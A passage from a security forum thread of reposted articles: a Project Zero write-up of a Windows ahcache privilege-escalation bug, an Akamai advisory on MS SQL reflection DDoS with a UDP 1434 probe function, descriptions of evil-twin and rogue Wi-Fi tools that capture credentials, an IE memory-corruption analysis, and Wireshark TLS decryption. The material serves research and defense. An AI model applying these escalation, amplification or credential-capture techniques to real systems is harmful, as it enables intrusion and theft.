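    xfo = next((v for k, v in headers.items()
                if k.lower() == "x-frame-options"), None)
    # DENY and SAMEORIGIN both block cross-origin framing
    return xfo is None or xfo.strip().upper() not in ("DENY", "SAMEORIGIN")

# Illustrative header sets (hypothetical, not captured traffic):
protected = {"Content-Type": "text/html", "X-Frame-Options": "DENY"}
error_page = {"Content-Type": "text/html"}   # the "gap": no XFO header at all

print(frameable(protected))   # False
print(frameable(error_page))  # True
```

This mirrors the advisory's point that the header was enforced on most pages but missing on some error pages, which was enough for the attack to work.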
  10. Nytro

    BSA

    Haaa, warn and ban
  11. Introducing Registry Explorer

Registry Explorer is a new approach to interacting with Registry hives. It has several unique capabilities not found in other programs. The version being discussed here is 0.0.1.8 (some of the screenshots may reflect v0.0.1.7). It is an early beta version of RE compared to where it will be, but the features discussed below are ready for general use.

Known issues: Large hives (SOFTWARE hives especially) can be slow to load in RE due to the number of keys that exist (often hundreds of thousands). Give RE a few minutes to load them, though, and it will work. This is being addressed.

Getting started

To get started, let's take a look at the main interface. There is of course a standard menu bar at the top of the screen. Most of the options are self-explanatory, but let's look at a few of them.

View | Messages

The Messages window is automatically displayed when RE starts. It will contain information about loading hives, warnings, errors, etc. If you have used ShellBags Explorer, it looks and feels pretty much the same as in SBE.

Download: binary foray: Software Sursa: binary foray: Introducing Registry Explorer
  12. Posted by James Forshaw, currently impersonating NT AUTHORITY\SYSTEM.

Much as I enjoy the process of vulnerability research, sometimes there's a significant disparity between the difficulty of finding a vulnerability and exploiting it. The Project Zero blog contains numerous examples of complex exploits for seemingly trivial vulnerabilities. You might wonder why we'd go to this level of effort to prove exploitability; surely we don't need to do so? Hopefully by the end of this blog post you'll have a better understanding of why it's often the case that we spend significant effort to demonstrate a security issue by developing a working proof of concept. Our primary target for a PoC is the vendor, but there are other benefits to developing one. A customer of the vendor's system can use the PoC to test whether they're vulnerable to the issue and ensure any patch has been correctly applied. And the security industry can use it to develop mitigations and signatures for the vulnerability even if the vendor is not willing or able to patch. Without the PoC being made available, only people who reverse engineer the patch are likely to know about it, and they might not have your best interests in mind. I don't want this blog post to get bogged down in too much technical detail about the bug (CVE-2015-0002 for reference). Instead I'm going to focus on the process of taking that relatively simple vulnerability, determining exploitability and developing a PoC. This PoC should be sufficient for a vendor to make a reasonable assessment of the presented vulnerability to minimize their triage efforts. I'll also explain my rationale for taking various shortcuts in PoC development and why it has to be so.

Reporting a Vulnerability

One of the biggest issues with vulnerability research on closed or proprietary systems is dealing with the actual reporting process to get a vulnerability fixed. This is especially the case with complex or non-obvious vulnerabilities. 
If the system is open source, I could develop a patch, submit it and it stands a chance of getting fixed. For a closed source system I will have to go through the process of reporting. To understand this better let's think about what a typical large vendor might need to do when receiving external security vulnerability reports. This is a really simplified view on vulnerability response handling but it's sufficient to explain the principles. For a company which develops the majority of their software internally I would have little influence over the patching cycle, but I can make a difference in the triage cycle. The easier I can make the vendor's life the shorter the triage cycle can be and the quicker we can get a patch released. Everyone wins, except hopefully the people who might be using this vulnerability already. Don't forget just because I didn't know about this vulnerability before doesn't mean it isn't already known about. In an ideal vulnerability research world (i.e. one in which I have to do the least amount of non-research work) if I find a bug all I'd need to do is write up some quick notes about it, send it to a vendor, they'll understand the system, they'll immediately move heaven and earth to develop the patch, job done. Of course it doesn't work that way, sometimes just getting a vendor to recognize there's even a security issue is an important first step. There can be a significant barrier between moving from the triage cycle to the patch cycle, especially as they're usually separate entities inside a company. To provide the best chance possible I'll do two things:

    Put together a report of sufficient detail so the vendor understands the vulnerability
    Develop a PoC which unequivocally demonstrates the security impact

Writing up a Report

Writing up a report for the vendor is pretty crucial to getting an issue fixed, although it isn't sufficient in many cases. 
You can imagine if I wrote something like, "Bug in ahcache.sys, fixit, *lol*" that doesn't really help the vendor much. At the very least I'd want to provide some context, such as what systems the vulnerability affects (and doesn't affect), what the impact of the vulnerability is (to the best of my knowledge) and what area of the system the issue resides in. Why wouldn't the report alone be sufficient? Think about how a large modern software product is developed. It's likely developed by a team of people who might work on individual parts. Depending on the age of the vulnerable code the original developer might have moved on to other projects, left the company entirely or been hit by the number 42 bus. Even if it's relatively recent code written by a single person who's still around to talk to, it doesn't mean they remember how the code works. Anyone who's developed software of any size will have come across code they wrote a month, week or even a day ago and wondered how it works. There's a real possibility that the security researcher who's spent time going through the executable instruction by instruction might know it better than anyone in the world. You can also think about the report in a scientific sense: it's your vulnerability hypothesis. Some vulnerabilities can be proven; for example a buffer overflow can typically be proven mathematically, placing 10 things into space for 5 doesn't work. But in many cases there's nothing better than empirical proof of exploitability. If done right it can be experimentally validated by both the reporter and the vendor; this is the value of a proof-of-concept. Correctly developed, it lets the vendor observe the effects of the experiment, converting my hypothesis into a theory which no-one can disprove.

Proving Exploitability through Experimentation

So the hypothesis posits that the vulnerability has a real-world security impact; we'll prove it objectively using our PoC. 
In order to do this we need to provide the vendor not just with the mechanism to prove that the vulnerability is real but also with clear observations that can be made, and why those observations constitute a security issue. What observations need to be made depends on the type of vulnerability. For memory corruption vulnerabilities it might be sufficient to demonstrate an application crashing in response to certain input. This isn't always the case; some memory corruptions don't give the attacker any useful control. Therefore demonstrating control over the current execution flow, such as controlling the EIP register, is usually the ideal. For logical vulnerabilities it might be more nuanced, such as being able to write a file to a location you shouldn't, or the calculator application ending up running with elevated privileges. There's no one-size-fits-all approach; however at the very least you want to demonstrate some security impact which can be observed objectively. The thing to understand is that I'm not developing a PoC for the purposes of being a useful exploit (from an attacker's perspective) but to prove it's a security issue to a sufficient level of confidence that it will get fixed. Unfortunately it isn't always easy to separate these two aspects, and sometimes without demonstrating local privilege escalation or remote code execution it isn't taken as seriously as it should be.

Developing a Proof of Concept

Now let's go into some of the challenges I faced in developing a PoC for the ahcache vulnerability I identified. Let's not forget there's a trade-off between the time spent developing a PoC and the chance of the vulnerability being fixed. If I don't spend enough time to develop a working PoC the vendor could turn around and not fix the vulnerability; on the other hand, the more time I spend the longer this vulnerability exists, which is potentially just as bad for users. 
Vulnerability Technical Details

Having a bit of understanding of the vulnerability will help us frame the discussion later. You can view the issue here with the attached PoC that I sent to Microsoft. The vulnerability exists in the ahcache.sys driver which was introduced in Windows 8.1; in essence this driver implements the Windows native system call NtApphelpCacheControl. This system call handles a local cache for application compatibility information which is used to correct application behaviour on newer versions of Windows. You can read more about application compatibility here. Some operations of this system call are privileged, so the driver does a check of the current calling application to ensure they have administrator privileges. This is done in the function AhcVerifyAdminContext which looks something like the following code:

    BOOLEAN AhcVerifyAdminContext()
    {
        BOOLEAN CopyOnOpen;
        BOOLEAN EffectiveOnly;
        SECURITY_IMPERSONATION_LEVEL ImpersonationLevel;
        PACCESS_TOKEN token = PsReferenceImpersonationToken(
            NtCurrentThread(),
            &CopyOnOpen,
            &EffectiveOnly,
            &ImpersonationLevel);

        if (token == NULL) {
            token = PsReferencePrimaryToken(NtCurrentProcess());
        }

        PSID user = GetTokenUser(token);
        if (RtlEqualSid(user, LocalSystemSid) || SeTokenIsAdmin(token)) {
            return TRUE;
        }

        return FALSE;
    }

This code queries whether the current thread is impersonating another user. Windows allows a thread to pretend to be someone else on the system so that security operations can be correctly evaluated. If the thread is impersonating, a pointer to an access token is returned. If NULL is returned from PsReferenceImpersonationToken the code queries for the current process' access token. Finally the code checks whether either the access token's user is the local system user or the token is a member of the Administrators group. If the function returns TRUE then the privileged operation is allowed to go ahead. This all seems fine, so what's the issue? 
While full impersonation is a privileged operation limited to users which have the impersonate privilege in their token, a normal user without the privilege can impersonate other users for non-security related functions. The kernel differentiates between privileged and unprivileged impersonation by assigning a security level to the token when impersonation is enabled. To understand the vulnerability there are only two levels of interest: SecurityImpersonation, which means the impersonation is privileged, and SecurityIdentification, which is unprivileged. If the token is assigned SecurityIdentification, only operations such as querying for token information, such as the token's user, are allowed. If you try to open a secured resource such as a file, the kernel will deny access. This is the underlying vulnerability: if you look at the code, PsReferenceImpersonationToken returns a copy of the security level assigned to the token, but the code fails to verify it's at SecurityImpersonation level. This means a normal user who was able to get hold of a Local System access token could impersonate at SecurityIdentification and still pass the check, as querying for the user is permitted.

Proving Trivial Exploitation

Exploiting the bug requires capturing a Local System access token, impersonating it and then calling the system call with appropriate parameters. This must be achievable from normal user privilege, otherwise it isn't a security vulnerability. The system call is undocumented, so if we wanted to take a shortcut could we just demonstrate that we can capture the token and leave it at that? Well not really; what this PoC would demonstrate is that something which is documented as possible is indeed possible. Namely that it's possible for a normal user to capture the token and impersonate it; as the impersonation system is designed, this would not cause a security issue. 
I knew already that COM supports impersonation, and that there are a number of complex system privileged services (for example BITS) we can communicate with as a normal user that we could convince to communicate back to our application in order to perform the impersonation. This wouldn't demonstrate that we can even reach the vulnerable AhcVerifyAdminContext method in the kernel, let alone successfully bypass the check. So starts the long process of reverse engineering to work out how the system call works and what parameters you need to pass to get it to do something useful. There's some existing work from other researchers (such as this) but certainly nothing concrete to take forward. The system call supports a number of different operations; it turned out that not all the operations needed complex parameters. For example the AppHelpNotifyStart and AppHelpNotifyStop operations could be easily called, and they relied on the AhcVerifyAdminContext function. I could now produce a PoC which we can verify bypasses the check by observing the system call's return code.

    BOOL IsSecurityVulnerability()
    {
        ImpersonateLocalSystem();
        NTSTATUS status = NtApphelpCacheControl(AppHelpNotifyStop, NULL);
        return status != STATUS_ACCESS_DENIED;
    }

Is this sufficient to prove exploitability? History has taught me no; for example this issue has almost the exact same sort of operation, namely you can bypass an administrator check through impersonation. In that case I couldn't produce sufficient evidence that it was exploitable for anything other than information disclosure. So in turn it was not fixed, even though it was effectively a security issue. To give ourselves the best chance of proving exploitability we need to spend more time on this PoC.

Improving the Proof-of-Concept

In order to improve upon the first PoC I would need to get a better understanding of what the system call is doing. 
The application compatibility cache is used to store the lookup data from the application compatibility database. This database contains rules which tell the application compatibility system what executables to apply "shims" to in order to implement custom behaviours, such as lying about the operating system's version number to circumvent an incorrect check. The lookup is made every time a process is created; if a suitable matching entry is found it'll be applied to the new process. The new process will then look up the shim data it needs to apply from the database. As this occurs every time a new process is created, there's a significant performance impact in going to the database file every time. The cache is there to reduce this impact: the database lookup can be added to the cache, and if that executable is created later the cached lookup can quickly eliminate the expensive database lookup and either apply a set of shims or not. Therefore we should be able to cache an existing lookup and apply it to an arbitrary executable. So I spent some time working out the format of the parameters to the system call in order to add my own cached lookup. The resulting structure for Windows 8.1 32 bit looked like the following:

    struct ApphelpCacheControlData {
        BYTE           unk0[0x98];
        DWORD          query_flags;
        DWORD          cache_flags;
        HANDLE         file_handle;
        HANDLE         process_handle;
        UNICODE_STRING file_name;
        UNICODE_STRING package_name;
        DWORD          buf_len;
        LPVOID         buffer;
        BYTE           unkC0[0x2C];
        UNICODE_STRING module_name;
        BYTE           unkF4[0x14];
    };

You can see there's an awful lot of unknown parts in the structure. This causes a problem if you were to apply this to Windows 7 (which has a slightly different structure) or 64 bit (which has a different sized structure), but for our purposes it doesn't matter. We're not supposed to be writing code to exploit all versions of Windows; all we need to do is prove the security issue to the vendor. 
As long as you inform the vendor of the PoC limitations (and they pay attention to them) we can do this. The vendor's still better placed to determine if this PoC proves exploitability across versions of the OS; it's their product after all. So I could now add an arbitrary cached entry, but what could we actually add? I could only add an entry which would have been the result of an existing lookup. You could modify the database to do something like patch running code (the application compatibility system is also used for hotfixes) but that would require administrator privileges. So I needed an existing shim to repurpose. I built a copy of the SDB explorer tool (available from here) so that I could dump the existing database looking for any useful existing shim. I found that for 32 bit there's a shim which will cause a process to start the executable regsvr32.exe passing the original command line. This tool will load a DLL passed on the command line and execute specific exported methods; if we could control the command line of a privileged process we could redirect it and elevate privileges. This again limits the PoC to only 32 bit processes, but that's fine. The final step, and what caused a lot of confusion, was what process to choose to redirect. I could have spent a lot of time investigating other ways of achieving the requirement of starting a process where I control the command line, but I already knew one way of doing it: UAC auto elevation. Auto elevation is a feature added to Windows 7 to reduce the number of UAC dialogs a typical user sees. The OS defines a fixed list of allowed auto elevating applications; when UAC is at its default setting, requests to elevate these applications do not show a dialog when the user's an administrator. I can abuse this by applying a cache entry for an existing auto elevating application (in this case I chose ComputerDefaults.exe) and requesting the application runs elevated. 
This elevated application redirects to regsvr32 passing our fully controlled command line; regsvr32 loads my DLL and we've now got code executing with elevated privileges. The PoC didn't give someone anything they couldn't already do through various other mechanisms (such as this metasploit module) but it was never meant to. It sufficiently demonstrated the issue by providing an observable result (arbitrary code running as an administrator); from this Microsoft were able to reproduce it and fix it.

Final Bit of Fun

As there was some confusion over whether this was only a UAC bypass, I decided to spend a little time developing a new PoC which gets local system privileges without any reliance on UAC. Sometimes I enjoy writing exploits, if only to prove that it can be done. To convert the original PoC to one which gets local system privileges I needed a different application to redirect. I decided the most likely target was a registered scheduled task, as you can sometimes pass arbitrary arguments to the task handler process. So we've got three criteria for the ideal task: a normal user must be able to start it, it must result in a process starting as local system, and that process must have an arbitrary command line specified by the user. After a bit of searching I found the ideal candidate, the Windows Store Maintenance Task. As we can see, it runs as the local system user. We can determine that a normal user can start it by looking at the task file's DACL using a tool such as icacls. Notice the entry in the following screenshot for NT AUTHORITY\Authenticated Users with Read and Execute (RX) permissions. Finally we can check whether a normal user can pass any arguments to the task by checking the XML task file. In the case of WSTask it uses a custom COM handler, but allows the user to specify two command line arguments. This results in the executable c:\windows\system32\taskhost.exe executing with an arbitrary command line as the local system user. 
It was just a case of modifying the PoC to add a cache entry for taskhost.exe and start the task with the path to our DLL. This still has a limitation: it only works on 32 bit Windows 8.1 (there's no 32 bit taskhost.exe on 64 bit platforms to redirect). Still, I'm sure it can be made to work on 64 bit with a bit more effort. As the vulnerability is now fixed I've made the new PoC available; it's attached to the original issue here.

Conclusions

I hope I've demonstrated some of the effort a vulnerability researcher will go to in order to ensure a vulnerability is fixed. It's ultimately a trade-off between the time spent developing the PoC and the chances of the vulnerability being fixed, especially when the vulnerability is complex or non-obvious. In this case I felt I made the right trade-off. Even though the PoC I sent to Microsoft looked, on the surface, to be only a UAC bypass, combined with the report they were able to determine the true severity and develop the patch. Of course if they'd pushed back and claimed it was not exploitable then I would have developed a more robust PoC. As a further demonstration of the severity I did produce a working exploit which gained local system privileges from a normal user account. Disclosing the PoC exploit is of value in aiding a user's or security company's mitigation of a public vulnerability. Without a PoC it's quite difficult to verify that a security issue has been patched or mitigated. It also helps to inform researchers and developers what types of issues to look out for when developing certain security sensitive applications. Bug hunting is not the sole approach for Project Zero to help secure software; education is just as important. Project Zero's mission involves tackling software vulnerabilities, and the development of PoCs can be an important part of our duty to help software vendors or open source projects take informed action to fix vulnerabilities. 
Posted by Chris Evans at 5:27 PM Sursa: http://googleprojectzero.blogspot.co.uk/2015/02/a-tokens-tale_9.html
  13. Attackers Using New MS SQL Reflection Techniques

By Bill Brenner, February 12, 2015 6:30 AM

The bad guys are using a fairly new technique to tamper with the Microsoft SQL Server Resolution Protocol (MC-SQLR) and launch DDoS attacks. In an advisory released this morning, Akamai's Prolexic Security Engineering & Response Team (PLXsert) described it as a new type of reflection-based distributed denial of service (DDoS) attack. PLXsert first spotted attackers using the technique in October. Last month, researcher Kurt Aubuchon studied another such attack and offered an analysis here. PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool.

Download the full advisory

How it works

The attack manifests in the form of Microsoft SQL Server responses to a client query or request via abuse of the Microsoft SQL Server Resolution Protocol (MC-SQLR), which listens on UDP port 1434. MC-SQLR lets clients identify the database instance with which they are attempting to communicate when connecting to a database server or cluster with multiple database instances. Each time a client needs to obtain information on configured MS SQL servers on the network, the SQL Resolution Protocol can be used. The server responds to the client with a list of instances. Attackers abuse SQL servers by executing scripted requests and spoofing the source of the query with the IP address of the intended target. Depending on the number of instances present in the abused SQL server, the amplification factor varies. The attack presents a specific payload signature, producing an amplification factor of nearly 25x. In this case, the attacker's request totaled 29 bytes, including IP and UDP headers, and triggered a response of 719 bytes including headers. Some servers may produce a larger or smaller response depending on their configuration. Other tools publicly available on the Internet could reproduce this attack as well. 
Replicating this attack does not require a high level of technical skill. A scripted attack would only require a list of SQL servers exposed on the Internet that respond to the query. Attackers could use a unicast client request 0x03 or a broadcast request 0x02. Both are requests with a data length of 1 byte that will produce the same type of response from SQL servers. PLXsert identified a tool on GitHub on January 26, 2015, that weaponizes this type of attack for mass abuse.

Defensive measures

Server hardening procedures should always be applied to servers that are exposed to the Internet. As a general rule, services and protocols that are unnecessary should be disabled or blocked. This attack can only be performed by querying SQL servers with SQL Server Resolution Protocol ports exposed to the Internet. The following best practices can help mitigate this type of DDoS attack. These recommendations are by no means exhaustive and affected organizations should refine and adapt them further based on their specific infrastructure and exposed services.

    Follow Microsoft Technet Security Best Practices to Protect Internet Facing Web Servers.
    The use of ingress and egress filters applied to SQL server ports at firewalls, routers, or edge devices may prevent this attack. If there is a business case for keeping UDP 1434 open, it should be filtered to only allow trusted IP addresses.
    Block inbound connections from the Internet if ports are not needed for external access or administration.
    The SQL Server Resolution Protocol service is not needed on servers that have only one database instance. It has been disabled by default since Microsoft SQL Server 2008; it is not disabled in earlier or desktop engine versions. Disable this service to prevent the abuse of the SQL server for this type of attack. 
If the use of SQL Server Resolution Protocol service is needed, add an additional layer of security before the service is accessed, such as authentication via secure methods (SSH, VPN) or filtering as described above. Sursa: https://blogs.akamai.com/2015/02/plxsert-warns-of-ms-sql-reflection-attacks.html
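The numbers quoted in the advisory are easy to sanity-check: a 1-byte 0x03 payload plus 28 bytes of IP/UDP headers gives the 29-byte request, and a 719-byte response yields roughly 25x amplification. A small sketch of that arithmetic follows; the probe function is a hypothetical illustration for testing servers you administer, not PLXsert's actual Scapy script:

```python
import socket

CLNT_UCAST_EX = b"\x03"   # unicast "enumerate instances" request
IP_UDP_HEADERS = 28       # 20-byte IPv4 header + 8-byte UDP header

def amplification_factor(payload: bytes, response_total: int) -> float:
    """Response size divided by request size, both including headers."""
    return response_total / (len(payload) + IP_UDP_HEADERS)

def probe_mssql_browser(host: str, timeout: float = 2.0) -> bytes:
    """Ask a host's MC-SQLR service (UDP 1434) to enumerate instances.
    Only use against servers you administer."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, 1434))
        data, _ = s.recvfrom(65535)
        return data

# The advisory's example: 29-byte request, 719-byte response -> ~25x
print(round(amplification_factor(CLNT_UCAST_EX, 719), 1))
```

If `probe_mssql_browser` returns any data at all from an Internet-facing host, that host can be abused as a reflector and the filtering advice above applies.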
  14. gosms

Your own local SMS gateway

What's the use? Can be used to send SMS where you don't have access to the internet, cannot use Web SMS gateways, want to save some money per SMS, or have minimal requirements for personal / internal use and such

    deploy in less than 1 minute
    supports Windows, GNU\Linux, Mac OS
    works with GSM modems
    provides API over HTTP to push messages to gateway, just like the internet based gateways do
    takes care of queuing, throttling and retrying
    supports multiple devices at once

Deployment

Update the conf.ini [DEVICES] section with your modem's COM port, for ex. COM10 or /dev/USBtty2. Run

Sursa: https://github.com/haxpax/gosms
  15. INFERNAL-TWIN

This is a tool created to automate the Evil Twin attack, capturing public and guest credentials of an Access Point.

infernal-twin

What does this tool do?

    Set up monitoring interface
    Set up DB
    Scan wireless networks in range
    Connect to the network of the selected SSID
    Obtain the authentication login page
    Modify the login page with an attacker-controlled php script to obtain the credentials
    Set up Apache Server and serve the fake login page
    Give the victim an IP
    Set up NAT table
    Dump the traffic

Source && Download

Sursa: infernal-twin - This is evil twin attack automated
  16. 3VILTWINATTACKER – ROGUE WI-FI ACCESS POINT

This tool creates a rogue Wi-Fi access point, purporting to provide wireless Internet services, but snooping on the traffic.

3vilTwinAttacker dependencies: Recommended for 3vilTwinAttacker – Kali Linux. Ettercap. Sslstrip. Airbase-ng, included in aircrack-ng. DHCP.

Ubuntu
    $ sudo apt-get install isc-dhcp-server
Kali linux
    $ echo "deb Index of /debian wheezy main " >> /etc/apt/sources.list
    $ apt-get update && apt-get install isc-dhcp-server
Fedora
    $ sudo yum install dhcp

3vilTwinAttacker Options:

    Etter.dns: Edit etter.dns to load the dns spoof module.
    Dns Spoof: Start a dns spoof attack on interface ath0 (fake AP).
    Ettercap: Start an ettercap attack against hosts connected to the fake AP, capturing login credentials.
    Sslstrip: sslstrip listens to the traffic on port 10000.
    Driftnet: driftnet sniffs and decodes any JPEG TCP sessions, then displays them in a window.

Source && Download

Sursa: 3vilTwinAttacker - Rogue Wi-Fi Access Point
  17. WAIDPS – WIRELESS AUDITING AND IPS/IDS

WAIDPS is an open source wireless swissknife written in Python that works in a Linux environment. It is a multipurpose tool designed for auditing (penetration testing) networks, detecting wireless intrusion (WEP/WPA/WPS attacks) and also intrusion prevention (stopping a station from associating to an access point). Apart from these, it will harvest all WiFi information in the surrounding area and store it in databases. This is useful when it comes to auditing a network if the access point is 'MAC filtered' or has a 'hidden SSID' and there isn't any existing client at that moment. WAIDPS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who are interested in knowing more about wireless auditing and protection. The primary purpose of this script is to detect intrusion. Once a wireless intrusion is detected, it is displayed on screen and the attack is also logged to file. Additional features added to the current script which previous WIDS do not have are:

    automatically save the attack packets into a file
    interactive mode where users are allowed to perform many functions
    allow the user to analyse captured packets
    load a previously saved pcap file or any other pcap file to be examined
    customizing filters
    customize detection threshold (sensitivity of IDS in detection)

At present, WAIDPS is able to detect the following wireless attacks and will subsequently add other detection found in the previous WIDS.

    Association / Authentication flooding
    Detect mass deauthentication which may indicate a possible WPA attack for handshake
    Detect possible WEP attack using the ARP request replay method
    Detect possible WEP attack using the chopchop method
    Detect possible WPS pin bruteforce attack by Reaver, Bully, etc. 
- detection of an Evil Twin
- detection of a rogue access point

WAIDPS requirements — no special equipment is needed to use this script as long as you have the following:

- root access (admin)
- a wireless interface capable of monitoring and injection
- Python 2.7 installed
- Aircrack-NG suite installed
- TShark installed
- TCPDump installed
- Mergecap installed (for joining pcap files)
- xterm installed

Documentation, Source && Download

Source: WAIDPS - Wireless Auditing and IPS/IDS
  18. Microsoft Internet Explorer 9-11, Windows 7-8.1 Vulnerability (patched in late 2014)

Feb 12, 2015 • suto

I. Vulnerability description: uninitialized memory corruption leading to code execution.

II. Analysis: I crafted an HTML file called 1.html and opened it with IE11 on Windows 8.1, and the following crash happened (see the crash-dump screenshot). The call tree leads there (see the call-tree screenshot).

The root cause of the problem is a wrong assumption combined with memory that is not cleared. When this JavaScript line executes:

document.getElementsByTagName('tr')[0].insertCell();

the function CTableRowLayout::EnsureCells is called. Because a cell is being added to the row, the memory holding the row must be expanded. First it reallocates memory in CImplAry::EnsureSizeWorker to make room for the new TableRowLayout. The function successfully allocates the memory, but it never resets that memory to zero. The loop

while ( v2 > v4 )
{
  --v2;
  *(_DWORD *)(*(_DWORD *)(v3 + 76) + 4 * v2) = 1;
}

marks whether a cell exists in that row. At that moment the memory will look something like:

0xheap: 0x1 0x1 0x1 ... 0xc0c0c0c0

The value 0xc0c0c0c0 comes from uninitialized memory. So if we prepare some holes in memory with our own strings of a fitting size, freed before the reallocation, our value will end up in that location (e.g. 0x40404040 when our string is filled with 0x40404040). That happens when JavaScript adds a new row to the table:

document.getElementsByTagName('table')[0].insertRow();

That piece of memory is never reset to 1 to indicate that a cell exists there. So when IE later accesses that address, it treats our value as a pointer to a table cell object on the heap. From there it performs calculations and modifies memory, which can lead to a write to attacker-controlled memory, quite possibly an ASLR bypass (if the overwritten address is an array length) and code execution.

For the full PoC code, please email suto@vnsecurity.net

Happy hunting

Source: Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)
  19. Decrypting TLS Browser Traffic With Wireshark – The Easy Way!

Intro

Most IT people are somewhat familiar with Wireshark. It is a traffic analyzer that helps you learn how networking works, diagnose problems and much more. One of the problems with the way Wireshark works is that it can't easily analyze encrypted traffic, like TLS. It used to be that if you had the private key(s) you could feed them into Wireshark and it would decrypt the traffic on the fly, but that only worked when RSA was used for the key exchange. As people have started to embrace forward secrecy this broke, because having the private key is no longer enough to derive the actual session key used to decrypt the data. The other problem is that a private key should not, or cannot, leave the client, server or HSM it lives in. This led me to come up with very contrived ways of man-in-the-middling myself to decrypt the traffic (e.g. sslstrip).

Session Key Logging to the Rescue!

Well, my friends, I'm here to tell you that there is an easier way! It turns out that Firefox and the development version of Chrome both support logging the symmetric session keys used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto: decrypted TLS traffic. Read on to learn how to set this up.

Setting up our Browsers

If you prefer Chrome, you must use the Chrome dev channel for this to work; default Firefox works as-is. Next we need to set an environment variable.

On Windows: go into your computer properties, click "Advanced system settings", then "Environment Variables…". Add a new user variable called "SSLKEYLOGFILE" and point it at the location where you want the log file to live.
On Linux or Mac OS X:

$ export SSLKEYLOGFILE=~/path/to/sslkeylog.log

You can also add this as the last line of your ~/.bashrc on Linux, or ~/.MacOSX/environment on OS X, so that it is set every time you log in. The next time you launch Firefox or the dev channel of Chrome, they will log your TLS keys to this file.

Setting up Wireshark

You need at least Wireshark 1.6 for this to work. Simply go into Wireshark's preferences, expand the Protocols section, and browse to the location of your log file.

The Results

This is more along the lines of what we normally see when looking at a TLS packet. This is what it looks like when you switch to the "Decrypted SSL Data" tab. Note that we can now see the request information in plain text! Success!

Conclusion

I hope you learned something today; this makes capturing TLS communication much more straightforward. One of the nice things about this setup is that the client/server machine generating the TLS traffic doesn't need Wireshark on it, so you don't have to gum up a client's machine with tools they won't need. You can either have them dump the log to a network share, or copy it off the machine and reunite it with the machine doing the packet capture later. Thanks for stopping by!

References: Mozilla Wiki, Imperial Violet
Photo Credit: Mike

Source: https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/
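The GUI steps above boil down to a single Wireshark preference. On the 1.x/2.x releases current when this article was written, the preference key was ssl.keylog_file (it was renamed tls.keylog_file in Wireshark 3.0); the path below is illustrative:

```
# ~/.wireshark/preferences (path illustrative)
ssl.keylog_file: /home/user/sslkeylog.log
```

Setting it in the preferences file rather than the GUI is handy when you decrypt captures on a headless box with tshark.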
  20. Still, what is "black_death_c4t" doing there?
  21. And a budget of about $1000, or even more. You must have at least 50 posts in order to buy something.
  22. Yeah, that's bad. While you're testing (Buffering...), try passing it a parameter from -1 to 100, calling it every second, say:

Timer 1 sec: ->
for (i = -1 to 100) {
  x = sop.GetState(i)
  writetofile("i = " & i & " state = " & x)
}

And check whether anything changes...
  23. Concerns regarding the security of biometric authentication

February 2, 2015 — Daniel Tomescu

More and more of the gadgets we use these days (smart phones, smart watches, etc.) try to make a personal connection with their owner via his or her biometric characteristics. Using biometric measures for authentication is a fast-growing trend in the IT world, but there are genuine security concerns about the maturity of these methods and their security faults. How safe is it to use biometrics for authentication? Can they be bypassed? Let's find out!

How to find a good biometric characteristic?

At this moment, we have three main possibilities for verifying a user's identity: something the user knows (like a code or a passphrase), something the user has (a smart card or a token) or something the user is (a biometric characteristic). For a biometric characteristic to be considered a valid authentication method, it should have the following properties:

- Universality: the feature must be present in all individuals;
- Measurability: the feature can be measured, and individuals are willing to share it for measurement purposes;
- High accuracy: the feature can be measured with an acceptable error rate;
- Uniqueness: the feature should be different for every individual;
- Robustness: the feature should not vary over time for the same individual;
- Circumvention resistance: the feature should not be easily altered, imitated or replicated by third parties.

Although the standards might seem too restrictive, a large number of biometric characteristics meet the requirements above (or at least most of them) and can be used for user recognition.

Full article: Concerns regarding the security of biometric authentication – Security Café
  24. Minimum 50 posts for transactions.